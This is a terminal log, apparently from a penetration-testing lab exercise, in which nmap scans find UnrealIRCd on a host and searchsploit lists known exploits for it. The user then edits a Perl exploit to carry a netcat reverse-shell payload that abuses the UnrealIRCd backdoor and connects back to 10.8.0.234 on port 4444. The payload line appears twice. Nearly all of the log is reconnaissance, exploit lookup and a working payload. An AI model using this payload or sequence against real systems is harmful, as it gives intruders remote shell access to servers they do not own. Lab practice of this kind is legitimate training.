sudo nmap -p 6667 6697 8067 -sV -A 172.16.33.78
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 04:29 EDT
Nmap scan report for 172.16.33.78
Host is up (0.031s latency).

PORT     STATE SERVICE VERSION
6667/tcp open  irc     UnrealIRCd
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.2 - 4.9 (93%), Linux 5.0 - 5.5 (93%), QNAP QTS 4.0 - 4.2 (93%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: irc.foonet.com

TRACEROUTE (using port 6667/tcp)
HOP RTT      ADDRESS
1   31.82 ms 10.8.0.1
2   31.89 ms 172.16.33.78

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (1 host up) scanned in 24.84 seconds
                                                                                                                                               
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 6667,6697,8067 -sV -A 172.16.33.78
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 04:30 EDT
Nmap scan report for 172.16.33.78
Host is up (0.031s latency).

PORT     STATE SERVICE VERSION
6667/tcp open  irc     UnrealIRCd
6697/tcp open  irc     UnrealIRCd
8067/tcp open  irc     UnrealIRCd
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.5 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: irc.foonet.com

TRACEROUTE (using port 8067/tcp)
HOP RTT      ADDRESS
1   32.87 ms 10.8.0.1
2   33.24 ms 172.16.33.78

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.86 seconds

$ searchsploit UnrealIRCd                        
------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                               |  Path
------------------------------------------------------------------------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                                                 | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                                                      | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                                               | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                                                    | windows/dos/27407.pl
------------------------------------------------------------------------------------------------------------- ---------------------------------

 sudo nano 13853.pl

my $payload2 = 'AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bin/sh -i 2>&1|nc 10.8.0.234 4444 > /tmp/f;

my $payload2 = 'AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bin/sh -i 2>&1|nc 10.8.0.234 4444 > /tmp/f;
